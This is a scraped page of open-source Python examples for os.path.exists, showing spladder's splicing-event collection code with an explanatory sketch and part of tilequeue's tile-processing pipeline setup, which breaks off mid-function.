os.path.exists

Here are examples of the Python API os.path.exists, taken from open source projects.

200 Examples
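
Before the project examples, a minimal standalone sketch of the call itself: os.path.exists(path) returns True if path refers to an existing file or directory and False otherwise (it follows symbolic links, so a broken link also yields False). The file name below is purely illustrative.

import os

config_path = 'settings.yaml'  # hypothetical path, for illustration only
# True for existing files and directories, False otherwise
# (a broken symbolic link also gives False).
if os.path.exists(config_path):
    print('found %s' % config_path)
else:
    print('%s is missing' % config_path)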

Example 101

Project: spladder
Source File: collect.py
def collect_events(CFG):

    ### which events do we call
    do_exon_skip = ('exon_skip' in CFG['event_types'])
    do_intron_retention = ('intron_retention' in CFG['event_types'])
    do_mult_exon_skip = ('mult_exon_skip' in CFG['event_types'])
    do_alt_3prime = ('alt_3prime' in CFG['event_types'])
    do_alt_5prime = ('alt_5prime' in CFG['event_types'])
    do_mutex_exons = ('mutex_exons' in CFG['event_types'])

    ### init empty event fields
    if do_intron_retention:
        intron_reten_pos = sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')
    if do_exon_skip:
        exon_skip_pos = sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')
    if do_alt_3prime or do_alt_5prime:
        alt_end_5prime_pos = sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')
        alt_end_3prime_pos = sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')
    if do_mult_exon_skip:
        mult_exon_skip_pos = sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')
    if do_mutex_exons:
        mutex_exons_pos = sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')

    validate_tag = ''
    if 'validate_splicegraphs' in CFG and CFG['validate_splicegraphs']:
        validate_tag = '.validated'

    for i in range(len(CFG['samples'])):
        if CFG['same_genestruct_for_all_samples'] == 1 and i == 1:
            break

        if i > 0:
            if do_intron_retention:
                intron_reten_pos = sp.c_[intron_reten_pos, sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')]
            if do_exon_skip:
                exon_skip_pos = sp.c_[exon_skip_pos, sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')]
            if do_alt_3prime or do_alt_5prime:
                alt_end_5prime_pos = sp.c_[alt_end_5prime_pos, sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')]
                alt_end_3prime_pos = sp.c_[alt_end_3prime_pos, sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')]
            if do_mult_exon_skip:
                mult_exon_skip_pos = sp.c_[mult_exon_skip_pos, sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')]
            if do_mutex_exons:
                mutex_exons_pos = sp.c_[mutex_exons_pos, sp.zeros((len(CFG['replicate_idxs']), 1), dtype = 'object')]

        strain = CFG['strains'][i]

        for ridx in CFG['replicate_idxs']:
            if len(CFG['replicate_idxs']) > 1:
                rep_tag = '_R%i' % ridx
            else:
                rep_tag = ''

            if 'spladder_infile' in CFG:
                genes_fnames = CFG['spladder_infile']
            elif CFG['merge_strategy'] == 'single':
                genes_fnames = '%s/spladder/genes_graph_conf%i%s.%s.pickle' % (CFG['out_dirname'], CFG['confidence_level'], rep_tag, CFG['samples'][i])
            else:
                genes_fnames = '%s/spladder/genes_graph_conf%i%s.%s%s.pickle' % (CFG['out_dirname'], CFG['confidence_level'], rep_tag, CFG['merge_strategy'], validate_tag)

            ### define outfile names
            if CFG['merge_strategy'] == 'single':
                fn_out_ir = '%s/%s_intron_retention%s_C%i.pickle' % (CFG['out_dirname'], CFG['samples'][i], rep_tag, CFG['confidence_level'])
                fn_out_es = '%s/%s_exon_skip%s_C%i.pickle' % (CFG['out_dirname'], CFG['samples'][i], rep_tag, CFG['confidence_level'])
                fn_out_mes = '%s/%s_mult_exon_skip%s_C%i.pickle' % (CFG['out_dirname'], CFG['samples'][i], rep_tag, CFG['confidence_level']) 
                fn_out_a5 = '%s/%s_alt_5prime%s_C%i.pickle' % (CFG['out_dirname'], CFG['samples'][i], rep_tag, CFG['confidence_level'])
                fn_out_a3 = '%s/%s_alt_3prime%s_C%i.pickle' % (CFG['out_dirname'], CFG['samples'][i], rep_tag, CFG['confidence_level'])
                fn_out_mex = '%s/%s_mutex_exons%s_C%i.pickle' % (CFG['out_dirname'], CFG['samples'][i], rep_tag, CFG['confidence_level'])
            else:
                fn_out_ir = '%s/%s_intron_retention%s_C%i.pickle' % (CFG['out_dirname'], CFG['merge_strategy'], rep_tag, CFG['confidence_level'])
                fn_out_es = '%s/%s_exon_skip%s_C%i.pickle' % (CFG['out_dirname'], CFG['merge_strategy'], rep_tag, CFG['confidence_level'])
                fn_out_mes = '%s/%s_mult_exon_skip%s_C%i.pickle' % (CFG['out_dirname'], CFG['merge_strategy'], rep_tag, CFG['confidence_level']) 
                fn_out_a5 = '%s/%s_alt_5prime%s_C%i.pickle' % (CFG['out_dirname'], CFG['merge_strategy'], rep_tag, CFG['confidence_level'])
                fn_out_a3 = '%s/%s_alt_3prime%s_C%i.pickle' % (CFG['out_dirname'], CFG['merge_strategy'], rep_tag, CFG['confidence_level'])
                fn_out_mex = '%s/%s_mutex_exons%s_C%i.pickle' % (CFG['out_dirname'], CFG['merge_strategy'], rep_tag, CFG['confidence_level'])

            if do_intron_retention:
                intron_reten_pos[ridx, i] = []
            if do_exon_skip:
                exon_skip_pos[ridx, i] = []
            if do_mult_exon_skip:
                mult_exon_skip_pos[ridx, i] = []
            if do_alt_5prime:
                alt_end_5prime_pos[ridx, i] = []
            if do_alt_3prime:
                alt_end_3prime_pos[ridx, i] = []
            if do_mutex_exons:
                mutex_exons_pos[ridx, i] = []

            print '\nconfidence %i / sample %i / replicate %i' % (CFG['confidence_level'], i, ridx)

            if os.path.exists(genes_fnames):
                print 'Loading gene structure from %s ...' % genes_fnames
                (genes, inserted) = cPickle.load(open(genes_fnames, 'r'))
                print '... done.'
                
                if not 'chrm_lookup' in CFG:
                    CFG = append_chrms(sp.unique(sp.array([x.chr for x in genes], dtype='str')), CFG)

                ### detect intron retentions from splicegraph
                if do_intron_retention:
                    if not os.path.exists(fn_out_ir):
                        idx_intron_reten, intron_intron_reten = detect_events(genes, 'intron_retention', sp.where([x.is_alt for x in genes])[0], CFG)
                        for k in range(len(idx_intron_reten)):
                            gene = genes[idx_intron_reten[k]]

                            ### perform liftover between strains if necessary
                            exons = gene.splicegraph.vertices
                            if not 'reference_strain' in CFG:
                                exons_col = exons
                                exons_col_pos = exons
                            else:
                                exons_col = convert_strain_pos_intervals(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                                exons_col_pos = convert_strain_pos(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                            if exons_col.shape != exons_col_pos.shape: 
                                print 'skipping non-mappable intron retention event'
                                continue

                            ### build intron retention data structure
                            event = Event('intron_retention', gene.chr, gene.strand)
                            event.strain = sp.array([strain])
                            event.exons1 = sp.c_[exons[:, intron_intron_reten[k][0]], exons[:, intron_intron_reten[k][1]]].T
                            event.exons2 = sp.array([exons[:, intron_intron_reten[k][0]][0], exons[:, intron_intron_reten[k][1]][1]])
                            #event.exons2 = exons[:, intron_intron_reten[k][2]]
                            event.exons1_col = sp.c_[exons_col[:, intron_intron_reten[k][0]], exons_col[:, intron_intron_reten[k][1]]]
                            event.exons2_col = sp.array([exons_col[:, intron_intron_reten[k][0]][0], exons_col[:, intron_intron_reten[k][1]][1]])
                            #event.exons2_col = exons_col[:, intron_intron_reten[k][2]]
                            event.gene_name = sp.array([gene.name])
                            event.gene_idx = idx_intron_reten[k]
                            #event.transcript_type = sp.array([gene.transcript_type])
                            intron_reten_pos[ridx, i].append(event)
                    else:
                        print '%s already exists' % fn_out_ir

                ### detect exon_skips from splicegraph
                if do_exon_skip:
                    if not os.path.exists(fn_out_es):
                        idx_exon_skip, exon_exon_skip = detect_events(genes, 'exon_skip', sp.where([x.is_alt for x in genes])[0], CFG)
                        for k in range(len(idx_exon_skip)):
                            gene = genes[idx_exon_skip[k]]

                            ### perform liftover between strains if necessary
                            exons = gene.splicegraph.vertices
                            if not 'reference_strain' in CFG:
                                exons_col = exons
                                exons_col_pos = exons
                            else:
                                exons_col = convert_strain_pos_intervals(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                                exons_col_pos = convert_strain_pos(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                            if exons_col.shape != exons_col_pos.shape: 
                                print 'skipping non-mappable exon_skip event'
                                continue

                            ### build exon skip data structure
                            event = Event('exon_skip', gene.chr, gene.strand)
                            event.strain = sp.array([strain])
                            event.exons1 = sp.c_[exons[:, exon_exon_skip[k][0]], exons[:, exon_exon_skip[k][2]]].T
                            event.exons2 = sp.c_[exons[:, exon_exon_skip[k][0]], exons[:, exon_exon_skip[k][1]], exons[:, exon_exon_skip[k][2]]].T
                            event.exons1_col = sp.c_[exons_col[:, exon_exon_skip[k][0]], exons_col[:, exon_exon_skip[k][2]]].T
                            event.exons2_col = sp.c_[exons_col[:, exon_exon_skip[k][0]], exons_col[:, exon_exon_skip[k][1]], exons_col[:, exon_exon_skip[k][2]]].T
                            event.gene_name = sp.array([gene.name])
                            event.gene_idx = idx_exon_skip[k]
                            #event.transcript_type = sp.array([gene.transcript_type])
                            exon_skip_pos[ridx, i].append(event)
                    else:
                        print '%s already exists' % fn_out_es

                ### detect alternative intron_ends from splicegraph
                if do_alt_3prime or do_alt_5prime:
                    if not os.path.exists(fn_out_a5) or not os.path.exists(fn_out_a3):
                        idx_alt_end_5prime, exon_alt_end_5prime, idx_alt_end_3prime, exon_alt_end_3prime = detect_events(genes, 'alt_prime', sp.where([x.is_alt for x in genes])[0], CFG)
                        ### handle 5 prime events
                        for k in range(len(idx_alt_end_5prime)):
                            gene = genes[idx_alt_end_5prime[k]]

                            ### perform liftover between strains if necessary
                            exons = gene.splicegraph.vertices
                            if not 'reference_strain' in CFG:
                                exons_col = exons
                                exons_col_pos = exons
                            else:
                                exons_col = convert_strain_pos_intervals(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                                exons_col_pos = convert_strain_pos(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                            if exons_col.shape != exons_col_pos.shape: 
                                print 'skipping non-mappable alt 5-prime event'
                                continue
                            
                            for k1 in range(len(exon_alt_end_5prime[k]['fiveprimesites']) - 1):
                                for k2 in range(k1 + 1, len(exon_alt_end_5prime[k]['fiveprimesites'])):

                                    exon_alt1_col = exons_col[:, exon_alt_end_5prime[k]['fiveprimesites'][k1]].T
                                    exon_alt2_col = exons_col[:, exon_alt_end_5prime[k]['fiveprimesites'][k2]].T

                                    ### check if exons overlap
                                    if (exon_alt1_col[0] >= exon_alt2_col[1]) or (exon_alt1_col[1] <= exon_alt2_col[0]):
                                        continue

                                    event = Event('alt_5prime', gene.chr, gene.strand)
                                    event.strain = sp.array([strain])
                                    if gene.strand == '+':
                                        event.exons1 = sp.c_[exons[:, exon_alt_end_5prime[k]['fiveprimesites'][k1]], exons[:, exon_alt_end_5prime[k]['threeprimesite']]].T
                                        event.exons2 = sp.c_[exons[:, exon_alt_end_5prime[k]['fiveprimesites'][k2]], exons[:, exon_alt_end_5prime[k]['threeprimesite']]].T
                                        event.exons1_col = sp.c_[exons_col[:, exon_alt_end_5prime[k]['fiveprimesites'][k1]], exons_col[:, exon_alt_end_5prime[k]['threeprimesite']]].T
                                        event.exons2_col = sp.c_[exons_col[:, exon_alt_end_5prime[k]['fiveprimesites'][k2]], exons_col[:, exon_alt_end_5prime[k]['threeprimesite']]].T
                                    else:
                                        event.exons1 = sp.c_[exons[:, exon_alt_end_5prime[k]['threeprimesite']], exons[:, exon_alt_end_5prime[k]['fiveprimesites'][k1]]].T
                                        event.exons2 = sp.c_[exons[:, exon_alt_end_5prime[k]['threeprimesite']], exons[:, exon_alt_end_5prime[k]['fiveprimesites'][k2]]].T
                                        event.exons1_col = sp.c_[exons_col[:, exon_alt_end_5prime[k]['threeprimesite']], exons_col[:, exon_alt_end_5prime[k]['fiveprimesites'][k1]]].T
                                        event.exons2_col = sp.c_[exons_col[:, exon_alt_end_5prime[k]['threeprimesite']], exons_col[:, exon_alt_end_5prime[k]['fiveprimesites'][k2]]].T
                                    event.gene_name = sp.array([gene.name])
                                    event.gene_idx = idx_alt_end_5prime[k]

                                    ### assert that first isoform is always the shorter one
                                    if sp.sum(event.exons1[:, 1] - event.exons1[:, 0]) > sp.sum(event.exons2[:, 1] - event.exons2[:, 0]):
                                        _tmp = event.exons1.copy()
                                        event.exons1 = event.exons2.copy()
                                        event.exons2 = _tmp
                                    #event.transcript_type = sp.array([gene.transcript_type])
                                    alt_end_5prime_pos[ridx, i].append(event)

                        ### handle 3 prime events
                        for k in range(len(idx_alt_end_3prime)):
                            gene = genes[idx_alt_end_3prime[k]]

                            ### perform liftover between strains if necessary
                            exons = gene.splicegraph.vertices
                            if not 'reference_strain' in CFG:
                                exons_col = exons
                                exons_col_pos = exons
                            else:
                                exons_col = convert_strain_pos_intervals(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                                exons_col_pos = convert_strain_pos(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                            if exons_col.shape != exons_col_pos.shape: 
                                print 'skipping non-mappable alt 3-prime event'
                                continue

                            for k1 in range(len(exon_alt_end_3prime[k]['threeprimesites']) - 1):
                                for k2 in range(k1 + 1, len(exon_alt_end_3prime[k]['threeprimesites'])):

                                    exon_alt1_col = exons_col[:, exon_alt_end_3prime[k]['threeprimesites'][k1]].T
                                    exon_alt2_col = exons_col[:, exon_alt_end_3prime[k]['threeprimesites'][k2]].T

                                    ### check if exons overlap
                                    if (exon_alt1_col[0] >= exon_alt2_col[1]) or (exon_alt1_col[1] <= exon_alt2_col[0]):
                                        continue

                                    event = Event('alt_3prime', gene.chr, gene.strand)
                                    event.strain = sp.array([strain])
                                    if gene.strand == '+':
                                        event.exons1 = sp.c_[exons[:, exon_alt_end_3prime[k]['threeprimesites'][k1]], exons[:, exon_alt_end_3prime[k]['fiveprimesite']]].T
                                        event.exons2 = sp.c_[exons[:, exon_alt_end_3prime[k]['threeprimesites'][k2]], exons[:, exon_alt_end_3prime[k]['fiveprimesite']]].T
                                        event.exons1_col = sp.c_[exons_col[:, exon_alt_end_3prime[k]['threeprimesites'][k1]], exons_col[:, exon_alt_end_3prime[k]['fiveprimesite']]].T
                                        event.exons2_col = sp.c_[exons_col[:, exon_alt_end_3prime[k]['threeprimesites'][k2]], exons_col[:, exon_alt_end_3prime[k]['fiveprimesite']]].T
                                    else:
                                        event.exons1 = sp.c_[exons[:, exon_alt_end_3prime[k]['fiveprimesite']], exons[:, exon_alt_end_3prime[k]['threeprimesites'][k1]]].T
                                        event.exons2 = sp.c_[exons[:, exon_alt_end_3prime[k]['fiveprimesite']], exons[:, exon_alt_end_3prime[k]['threeprimesites'][k2]]].T
                                        event.exons1_col = sp.c_[exons_col[:, exon_alt_end_3prime[k]['fiveprimesite']], exons_col[:, exon_alt_end_3prime[k]['threeprimesites'][k1]]].T
                                        event.exons2_col = sp.c_[exons_col[:, exon_alt_end_3prime[k]['fiveprimesite']], exons_col[:, exon_alt_end_3prime[k]['threeprimesites'][k2]]].T
                                    event.gene_name = sp.array([gene.name])
                                    event.gene_idx = idx_alt_end_3prime[k]

                                    ### assert that first isoform is always the shorter one
                                    if sp.sum(event.exons1[:, 1] - event.exons1[:, 0]) > sp.sum(event.exons2[:, 1] - event.exons2[:, 0]):
                                        _tmp = event.exons1.copy()
                                        event.exons1 = event.exons2.copy()
                                        event.exons2 = _tmp

                                    #event.transcript_type = sp.array([gene.transcript_type])
                                    alt_end_3prime_pos[ridx, i].append(event)
                    else:
                        print '%s and %s already exists' % (fn_out_a5, fn_out_a3)

                ### detect multiple_exon_skips from splicegraph
                if do_mult_exon_skip:
                    if not os.path.exists(fn_out_mes):
                        idx_mult_exon_skip, exon_mult_exon_skip = detect_events(genes, 'mult_exon_skip', sp.where([x.is_alt for x in genes])[0], CFG)
                        for k, gidx in enumerate(idx_mult_exon_skip):
                            gene = genes[gidx] 

                            ### perform liftover between strains if necessary
                            exons = gene.splicegraph.vertices
                            if not 'reference_strain' in CFG:
                                exons_col = exons
                                exons_col_pos = exons
                            else:
                                exons_col = convert_strain_pos_intervals(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                                exons_col_pos = convert_strain_pos(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                            if exons_col.shape != exons_col_pos.shape: 
                                print 'skipping non-mappable multiple exon skip event'
                                continue

                            ### build multiple exon skip data structure
                            event = Event('mult_exon_skip', gene.chr, gene.strand)
                            event.strain = sp.array([strain])
                            event.exons1 = sp.c_[exons[:, exon_mult_exon_skip[k][0]], exons[:, exon_mult_exon_skip[k][2]]].T
                            event.exons2 = sp.c_[exons[:, exon_mult_exon_skip[k][0]], exons[:, exon_mult_exon_skip[k][1]], exons[:, exon_mult_exon_skip[k][2]]].T
                            event.exons1_col = sp.c_[exons_col[:, exon_mult_exon_skip[k][0]], exons_col[:, exon_mult_exon_skip[k][2]]].T
                            event.exons2_col = sp.c_[exons_col[:, exon_mult_exon_skip[k][0]], exons_col[:, exon_mult_exon_skip[k][1]], exons_col[:, exon_mult_exon_skip[k][2]]].T
                            event.gene_name = sp.array([gene.name])
                            event.gene_idx = gidx
                            #event.transcript_type = sp.array([gene.transcript_type])
                            mult_exon_skip_pos[ridx, i].append(event)
                    else:
                        print '%s already exists' % fn_out_mes

                ### detect mutually exclusive exons from splicegraph
                if do_mutex_exons:
                    if not os.path.exists(fn_out_mex):
                        idx_mutex_exons, exon_mutex_exons = detect_events(genes, 'mutex_exons', sp.where([x.is_alt for x in genes])[0], CFG)
                        if len(idx_mutex_exons) > 0:
                            for k in range(len(exon_mutex_exons)):
                                gene = genes[idx_mutex_exons[k]]

                                ### perform liftover between strains if necessary
                                exons = gene.splicegraph.vertices
                                if not 'reference_strain' in CFG:
                                    exons_col = exons
                                    exons_col_pos = exons
                                else:
                                    exons_col = convert_strain_pos_intervals(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T
                                    exons_col_pos = convert_strain_pos(gene.chr, gene.splicegraph.vertices.T, strain, CFG['reference_strain']).T

                                if exons_col.shape != exons_col_pos.shape: 
                                    print 'skipping non-mappable mutex exons event'
                                    continue

                                ### build data structure for mutually exclusive exons
                                event = Event('mutex_exons', gene.chr, gene.strand)
                                event.strain = sp.array([strain])
                                event.exons1 = sp.c_[exons[:, exon_mutex_exons[k][0]], exons[:, exon_mutex_exons[k][1]], exons[:, exon_mutex_exons[k][3]]].T
                                event.exons2 = sp.c_[exons[:, exon_mutex_exons[k][0]], exons[:, exon_mutex_exons[k][2]], exons[:, exon_mutex_exons[k][3]]].T
                                event.exons1_col = sp.c_[exons_col[:, exon_mutex_exons[k][0]], exons_col[:, exon_mutex_exons[k][1]], exons_col[:, exon_mutex_exons[k][3]]].T
                                event.exons2_col = sp.c_[exons_col[:, exon_mutex_exons[k][0]], exons_col[:, exon_mutex_exons[k][2]], exons_col[:, exon_mutex_exons[k][3]]].T
                                event.gene_name = sp.array([gene.name])
                                event.gene_idx = idx_mutex_exons[k]
                                #event.transcript_type = sp.array([gene.transcript_type])
                                mutex_exons_pos[ridx, i].append(event)
                    else:
                        print '%s already exists' % fn_out_mex

            ### genes file does not exist
            else:
                print 'result file not found: %s' % genes_fnames

    ### combine events for all samples
    for ridx in CFG['replicate_idxs']:

        ################################################%
        ### COMBINE INTRON RETENTIONS
        ################################################%
        if do_intron_retention:
            if not os.path.exists(fn_out_ir):
                intron_reten_pos_all = sp.array([item for sublist in intron_reten_pos[ridx, :] for item in sublist])

                ### post process event structure by sorting and making events unique
                events_all = post_process_event_struct(intron_reten_pos_all, CFG)

                ### store intron retentions
                print 'saving intron retentions to %s' % fn_out_ir
                cPickle.dump(events_all, open(fn_out_ir, 'w'), -1)
            else:
                print '%s already exists' % fn_out_ir
        
        ################################################%
        ### COMBINE EXON SKIPS
        ################################################%
        if do_exon_skip:
            if not os.path.exists(fn_out_es):
                exon_skip_pos_all = sp.array([item for sublist in exon_skip_pos[ridx, :] for item in sublist])

                ### post process event structure by sorting and making events unique
                events_all = post_process_event_struct(exon_skip_pos_all, CFG)

                ### store exon skip events
                print 'saving exon skips to %s' % fn_out_es
                cPickle.dump(events_all, open(fn_out_es, 'w'), -1)
            else:
                print '%s already exists' % fn_out_es

        ################################################%
        ### COMBINE MULTIPLE EXON SKIPS
        ################################################%
        if do_mult_exon_skip:
            if not os.path.exists(fn_out_mes):
                mult_exon_skip_pos_all = sp.array([item for sublist in mult_exon_skip_pos[ridx, :] for item in sublist])

                ### post process event structure by sorting and making events unique
                events_all = post_process_event_struct(mult_exon_skip_pos_all, CFG)

                ### store multiple exon skip events
                print 'saving multiple exon skips to %s' % fn_out_mes
                cPickle.dump(events_all, open(fn_out_mes, 'w'), -1)
            else:
                print '%s already exists' % fn_out_mes

        ################################################%
        ### COMBINE ALT FIVE PRIME EVENTS
        ################################################%
        if do_alt_5prime:
            if not os.path.exists(fn_out_a5):
                alt_end_5prime_pos_all = sp.array([item for sublist in alt_end_5prime_pos[ridx, :] for item in sublist])
              
                ### post process event structure by sorting and making events unique
                events_all = post_process_event_struct(alt_end_5prime_pos_all, CFG)

                ### curate alt prime events
                ### cut to min len, if alt exon lengths differ
                ### remove, if alt exons do not overlap
                if CFG['curate_alt_prime_events']:
                    events_all = curate_alt_prime(events_all, CFG)

                ### store alt 5 prime events
                print 'saving alt 5 prime events to %s' % fn_out_a5
                cPickle.dump(events_all, open(fn_out_a5, 'w'), -1)
            else:
                print '%s already exists' % fn_out_a5

        ################################################%
        ### COMBINE ALT THREE PRIME EVENTS
        ################################################%
        if do_alt_3prime:
            if not os.path.exists(fn_out_a3):
                alt_end_3prime_pos_all = sp.array([item for sublist in alt_end_3prime_pos[ridx, :] for item in sublist])
                ### post process event structure by sorting and making events unique
                events_all = post_process_event_struct(alt_end_3prime_pos_all, CFG)

                ### curate alt prime events
                ### cut to min len, if alt exon lengths differ
                ### remove, if alt exons do not overlap
                if CFG['curate_alt_prime_events']:
                    events_all = curate_alt_prime(events_all, CFG)

                ### store alt 3 prime events
                print 'saving alt 3 prime events to %s' % fn_out_a3
                cPickle.dump(events_all, open(fn_out_a3, 'w'), -1)
            else:
                print '%s already exists' % fn_out_a3

        ################################################%
        ### COMBINE MUTUALLY EXCLUSIVE EXONS
        ################################################%
        if do_mutex_exons:
            if not os.path.exists(fn_out_mex):
                mutex_exons_pos_all = sp.array([item for sublist in mutex_exons_pos[ridx, :] for item in sublist])

                ### post process event structure by sorting and making events unique
                events_all = post_process_event_struct(mutex_exons_pos_all, CFG)

                ### store mutually exclusive exon events
                print 'saving mutually exclusive exons to %s' % fn_out_mex
                cPickle.dump(events_all, open(fn_out_mex, 'w'), -1)
            else:
                print '%s already exists' % fn_out_mex
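
Every event type in the example above follows the same guard-and-cache pattern: os.path.exists gates the input (the gene-graph pickle is loaded only if it is on disk) and the output (the expensive detection step is skipped when the result pickle already exists). Below is a condensed sketch of that pattern, written as a Python 3 rewrite for illustration only; collect_one, detect and the file names are hypothetical stand-ins, not spladder's API.

import os
import pickle

def collect_one(fn_in, fn_out, detect):
    # Only proceed if the input pickle is actually on disk.
    if not os.path.exists(fn_in):
        print('result file not found: %s' % fn_in)
        return
    with open(fn_in, 'rb') as fh:
        genes = pickle.load(fh)

    # Skip the expensive detection step if the output already exists.
    if os.path.exists(fn_out):
        print('%s already exists' % fn_out)
        return
    # 'detect' stands in (hypothetically) for detect_events plus post-processing.
    events = detect(genes)
    with open(fn_out, 'wb') as fh:
        pickle.dump(events, fh, -1)

The exists() check on the output file acts as a cheap cache marker: re-running the collection step is idempotent and resumable, since completed event types are simply skipped.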

Example 102

Project: tilequeue
Source File: command.py
def tilequeue_process(cfg, peripherals):
    logger = make_logger(cfg, 'process')
    logger.warn('tilequeue processing started')

    assert os.path.exists(cfg.query_cfg), \
        'Invalid query config path'

    with open(cfg.query_cfg) as query_cfg_fp:
        query_cfg = yaml.load(query_cfg_fp)
    all_layer_data, layer_data, post_process_data = (
        parse_layer_data(
            query_cfg, cfg.buffer_cfg, cfg.template_path, cfg.reload_templates,
            os.path.dirname(cfg.query_cfg)))

    formats = lookup_formats(cfg.output_formats)

    sqs_queue = peripherals.queue

    store = make_store(cfg.store_type, cfg.s3_bucket, cfg)

    assert cfg.postgresql_conn_info, 'Missing postgresql connection info'

    n_cpu = multiprocessing.cpu_count()
    sqs_messages_per_batch = 10
    n_simultaneous_query_sets = cfg.n_simultaneous_query_sets
    if not n_simultaneous_query_sets:
        # default to number of databases configured
        n_simultaneous_query_sets = len(cfg.postgresql_conn_info['dbnames'])
    assert n_simultaneous_query_sets > 0
    default_queue_buffer_size = 128
    n_layers = len(all_layer_data)
    n_formats = len(formats)
    n_simultaneous_s3_storage = cfg.n_simultaneous_s3_storage
    if not n_simultaneous_s3_storage:
        n_simultaneous_s3_storage = max(n_cpu / 2, 1)
    assert n_simultaneous_s3_storage > 0

    # thread pool used for queries and uploading to s3
    n_total_needed_query = n_layers * n_simultaneous_query_sets
    n_total_needed_s3 = n_formats * n_simultaneous_s3_storage
    n_total_needed = n_total_needed_query + n_total_needed_s3
    n_max_io_workers = 50
    n_io_workers = min(n_total_needed, n_max_io_workers)
    io_pool = ThreadPool(n_io_workers)

    feature_fetcher = DataFetcher(cfg.postgresql_conn_info, all_layer_data,
                                  io_pool, n_layers)

    # create all queues used to manage pipeline

    sqs_input_queue_buffer_size = sqs_messages_per_batch
    # holds coord messages from sqs
    sqs_input_queue = Queue.Queue(sqs_input_queue_buffer_size)

    # holds raw sql results - no filtering or processing done on them
    sql_data_fetch_queue = multiprocessing.Queue(default_queue_buffer_size)

    # holds data after it has been filtered and processed
    # this is where the cpu intensive part of the operation will happen
    # the results will be data that is formatted for each necessary format
    processor_queue = multiprocessing.Queue(default_queue_buffer_size)

    # holds data after it has been sent to s3
    s3_store_queue = Queue.Queue(default_queue_buffer_size)

    # create worker threads/processes
    thread_sqs_queue_reader_stop = threading.Event()
    sqs_queue_reader = SqsQueueReader(sqs_queue, sqs_input_queue, logger,
                                      thread_sqs_queue_reader_stop)

    data_fetch = DataFetch(
        feature_fetcher, sqs_input_queue, sql_data_fetch_queue, io_pool,
        peripherals.redis_cache_index, logger)

    data_processor = ProcessAndFormatData(
        post_process_data, formats, sql_data_fetch_queue, processor_queue,
        cfg.layers_to_format, cfg.buffer_cfg, logger)

    s3_storage = S3Storage(processor_queue, s3_store_queue, io_pool,
                           store, logger)

    thread_sqs_writer_stop = threading.Event()
    sqs_queue_writer = SqsQueueWriter(sqs_queue, s3_store_queue, logger,
                                      thread_sqs_writer_stop)

    def create_and_start_thread(fn, *args):
        t = threading.Thread(target=fn, args=args)
        t.start()
        return t

    thread_sqs_queue_reader = create_and_start_thread(sqs_queue_reader)

    threads_data_fetch = []
    threads_data_fetch_stop = []
    for i in range(n_simultaneous_query_sets):
        thread_data_fetch_stop = threading.Event()
        thread_data_fetch = create_and_start_thread(data_fetch,
                                                    thread_data_fetch_stop)
        threads_data_fetch.append(thread_data_fetch)
        threads_data_fetch_stop.append(thread_data_fetch_stop)

    # create a data processor per cpu
    n_data_processors = n_cpu
    data_processors = []
    data_processors_stop = []
    for i in range(n_data_processors):
        data_processor_stop = multiprocessing.Event()
        process_data_processor = multiprocessing.Process(
            target=data_processor, args=(data_processor_stop,))
        process_data_processor.start()
        data_processors.append(process_data_processor)
        data_processors_stop.append(data_processor_stop)

    threads_s3_storage = []
    threads_s3_storage_stop = []
    for i in range(n_simultaneous_s3_storage):
        thread_s3_storage_stop = threading.Event()
        thread_s3_storage = create_and_start_thread(s3_storage,
                                                    thread_s3_storage_stop)
        threads_s3_storage.append(thread_s3_storage)
        threads_s3_storage_stop.append(thread_s3_storage_stop)

    thread_sqs_writer = create_and_start_thread(sqs_queue_writer)

    if cfg.log_queue_sizes:
        assert(cfg.log_queue_sizes_interval_seconds > 0)
        queue_data = (
            (sqs_input_queue, 'sqs'),
            (sql_data_fetch_queue, 'sql'),
            (processor_queue, 'proc'),
            (s3_store_queue, 's3'),
        )
        queue_printer_thread_stop = threading.Event()
        queue_printer = QueuePrint(
            cfg.log_queue_sizes_interval_seconds, queue_data, logger,
            queue_printer_thread_stop)
        queue_printer_thread = create_and_start_thread(queue_printer)
    else:
        queue_printer_thread = None
        queue_printer_thread_stop = None

    def stop_all_workers(signum, stack):
        logger.warn('tilequeue processing shutdown ...')

        logger.info('requesting all workers (threads and processes) stop ...')

        # each worker guards its read loop with an event object
        # ask all these to stop first

        thread_sqs_queue_reader_stop.set()
        for thread_data_fetch_stop in threads_data_fetch_stop:
            thread_data_fetch_stop.set()
        for data_processor_stop in data_processors_stop:
            data_processor_stop.set()
        for thread_s3_storage_stop in threads_s3_storage_stop:
            thread_s3_storage_stop.set()
        thread_sqs_writer_stop.set()

        if queue_printer_thread_stop:
            queue_printer_thread_stop.set()

        logger.info('requesting all workers (threads and processes) stop ... '
                    'done')

        # Once workers receive a stop event, they will keep reading
        # from their queues until they receive a sentinel value. This
        # is mandatory so that no messages will remain on queues when
        # asked to join. Otherwise, we never terminate.

        logger.info('joining all workers ...')

        logger.info('joining sqs queue reader ...')
        thread_sqs_queue_reader.join()
        logger.info('joining sqs queue reader ... done')
        logger.info('enqueueing sentinels for data fetchers ...')
        for i in range(len(threads_data_fetch)):
            sqs_input_queue.put(None)
        logger.info('enqueueing sentinels for data fetchers ... done')
        logger.info('joining data fetchers ...')
        for thread_data_fetch in threads_data_fetch:
            thread_data_fetch.join()
